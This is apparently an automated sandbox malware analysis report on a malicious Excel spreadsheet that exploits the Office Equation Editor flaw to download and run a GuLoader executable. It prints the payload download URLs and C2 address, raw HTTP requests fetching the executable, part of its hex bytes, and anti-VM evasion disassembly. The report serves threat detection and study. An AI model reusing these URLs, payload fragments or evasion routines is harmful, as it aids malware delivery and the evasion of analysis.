Windows Analysis Report Exhibitions Order Detailed list.xlsx

Overview

General Information

Sample Name: Exhibitions Order Detailed list.xlsx
Analysis ID: 457915
MD5: c8e623590aae92259642c8c80f761493
SHA1: 877da933e035b90f881d2c7ef3fa37f9065b6aa7
SHA256: 257645cd8e215cd4f9c2c153f3605e7389a2aed04a870a1aa0b4a4d9aa5762b3
Tags: VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://198.12.91.134/win/vbc.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUu"}
Multi AV Scanner detection for domain / URL
Source: http://198.12.91.134/win/vbc.exe Virustotal: Detection: 17%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Virustotal: Detection: 21%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe ReversingLabs: Detection: 10%
Source: C:\Users\Public\vbc.exe Virustotal: Detection: 21%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 10%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 198.12.91.134:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 198.12.91.134:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 68MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://101.99.94.119/WEALTH_PRUu
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
HTTP/1.1 200 OK
Date: Mon, 02 Aug 2021 12:50:18 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
Last-Modified: Mon, 02 Aug 2021 10:45:08 GMT
ETag: "1c000-5c891434c93da"
Accept-Ranges: bytes
Content-Length: 114688
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c3 1c 80 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 40 01 00 00 80 00 00 00 00 00 00 44 11 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 01 00 00 10 00 00 e1 60 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 4b 01 00 28 00 00 00 00 70 01 00 96 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 3d 01 00 00 10 00 00 00 40 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 5c 11 00 00 00 50 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 96 5b 00 00 00 70 01 00 00 60 00 00 00 60 01 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.12.91.134
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
GET /win/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 198.12.91.134
Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEC2566A.emf
Source: global traffic HTTP traffic detected:
GET /win/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 198.12.91.134
Connection: Keep-Alive
Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: BEC2566A.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5968 NtAllocateVirtualMemory, 6_2_003B5968
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5A62 NtAllocateVirtualMemory, 6_2_003B5A62
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5968 6_2_003B5968
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B40B7 6_2_003B40B7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B0211 6_2_003B0211
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B4339 6_2_003B4339
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B443A 6_2_003B443A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B94D8 6_2_003B94D8
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B853B 6_2_003B853B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B05A1 6_2_003B05A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B85E7 6_2_003B85E7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B95C6 6_2_003B95C6
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B86F4 6_2_003B86F4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B86DB 6_2_003B86DB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5781 6_2_003B5781
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B8802 6_2_003B8802
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2873 6_2_003B2873
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B891F 6_2_003B891F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B1900 6_2_003B1900
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B7A7A 6_2_003B7A7A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2A77 6_2_003B2A77
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5A62 6_2_003B5A62
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B0B59 6_2_003B0B59
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B3BFF 6_2_003B3BFF
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B0BDC 6_2_003B0BDC
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B8C2C 6_2_003B8C2C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B0CFA 6_2_003B0CFA
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B3CF2 6_2_003B3CF2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B3CEF 6_2_003B3CEF
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2D3B 6_2_003B2D3B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5D78 6_2_003B5D78
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B4DB6 6_2_003B4DB6
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B1DA0 6_2_003B1DA0
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B0DD5 6_2_003B0DD5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B7E5C 6_2_003B7E5C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B1E99 6_2_003B1E99
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B0ED2 6_2_003B0ED2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2FD3 6_2_003B2FD3
PE file contains strange resources
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/19@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Exhibitions Order Detailed list.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD539.tmp
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: Exhibitions Order Detailed list.xlsx Static file information: File size 1239040 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408873 push esp; ret 6_2_00408877
Source: C:\Users\Public\vbc.exe Code function: 6_2_004088C0 push esp; ret 6_2_004088CB
Source: C:\Users\Public\vbc.exe Code function: 6_2_004014E9 push es; ret 6_2_004014EA
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408CB2 push esi; ret 6_2_00408CB3
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040891C push esi; retf 6_2_0040892F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407D36 pushad ; iretd 6_2_00407D3B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408672 push esi; ret 6_2_00408677
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407E22 push ds; iretd 6_2_00407E27
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408624 push esp; ret 6_2_00408627
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408ADE push esi; retf 6_2_00408ADF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408695 push esi; ret 6_2_00408677
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B6625 push ebp; iretd 6_2_003B6637
Source: initial sample Static PE information: section name: .text entropy: 7.07266809617

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B0B59 6_2_003B0B59
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B0BDC 6_2_003B0BDC
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B0CFA 6_2_003B0CFA
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2D3B 6_2_003B2D3B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B0DD5 6_2_003B0DD5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2FD3 6_2_003B2FD3
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003B0298 second address: 00000000003B0298 instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003B7EAD second address: 00000000003B7EAD instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003B9858 second address: 00000000003B9858 instructions:
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003B0298 second address: 00000000003B0298 instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003B7EAD second address: 00000000003B7EAD instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003B9858 second address: 00000000003B9858 instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003B7CB5 second address: 00000000003B7CB5 instructions:
0x00000000 rdtsc
0x00000002 mov eax, 8D6257E7h
0x00000007 xor eax, D6E50CE5h
0x0000000c xor eax, CD304DCCh
0x00000011 add eax, 6948E933h
0x00000016 cpuid
0x00000018 popad
0x00000019 call 00007F1684EA0E03h
0x0000001e lfence
0x00000021 mov edx, 617AD252h
0x00000026 xor edx, 84973C64h
0x0000002c xor edx, 903C3D1Eh
0x00000032 xor edx, 0A2FD33Ch
0x00000038 mov edx, dword ptr [edx]
0x0000003a lfence
0x0000003d cmp edx, 53D52FB7h
0x00000043 cmp ah, ch
0x00000045 test cl, bl
0x00000047 ret
0x00000048 jmp 00007F1684EA0DF9h
0x0000004d cmp ch, dh
0x0000004f sub edx, esi
0x00000051 ret
0x00000052 add edi, edx
0x00000054 dec dword ptr [ebp+000000F8h]
0x0000005a cmp dword ptr [ebp+000000F8h], 00000000h
0x00000061 jne 00007F1684EA0CFCh
0x00000063 call 00007F1684EA0D57h
0x00000068 call 00007F1684EA0E24h
0x0000006d lfence
0x00000070 mov edx, 617AD252h
0x00000075 xor edx, 84973C64h
0x0000007b xor edx, 903C3D1Eh
0x00000081 xor edx, 0A2FD33Ch
0x00000087 mov edx, dword ptr [edx]
0x00000089 lfence
0x0000008c cmp edx, 53D52FB7h
0x00000092 cmp ah, ch
0x00000094 test cl, bl
0x00000096 ret
0x00000097 mov esi, edx
0x00000099 pushad
0x0000009a rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B40B7 rdtsc 6_2_003B40B7
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1748 Thread sleep time: -240000s >= -30000s

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B40B7 rdtsc 6_2_003B40B7
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B73B4 mov eax, dword ptr fs:[00000030h] 6_2_003B73B4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B3441 mov eax, dword ptr fs:[00000030h] 6_2_003B3441
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B853B mov eax, dword ptr fs:[00000030h] 6_2_003B853B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5589 mov eax, dword ptr fs:[00000030h] 6_2_003B5589
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B7898 mov eax, dword ptr fs:[00000030h] 6_2_003B7898
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2D3B mov eax, dword ptr fs:[00000030h] 6_2_003B2D3B

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000006.00000002.2350876912.00000000009F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2350876912.00000000009F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2350876912.00000000009F0000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid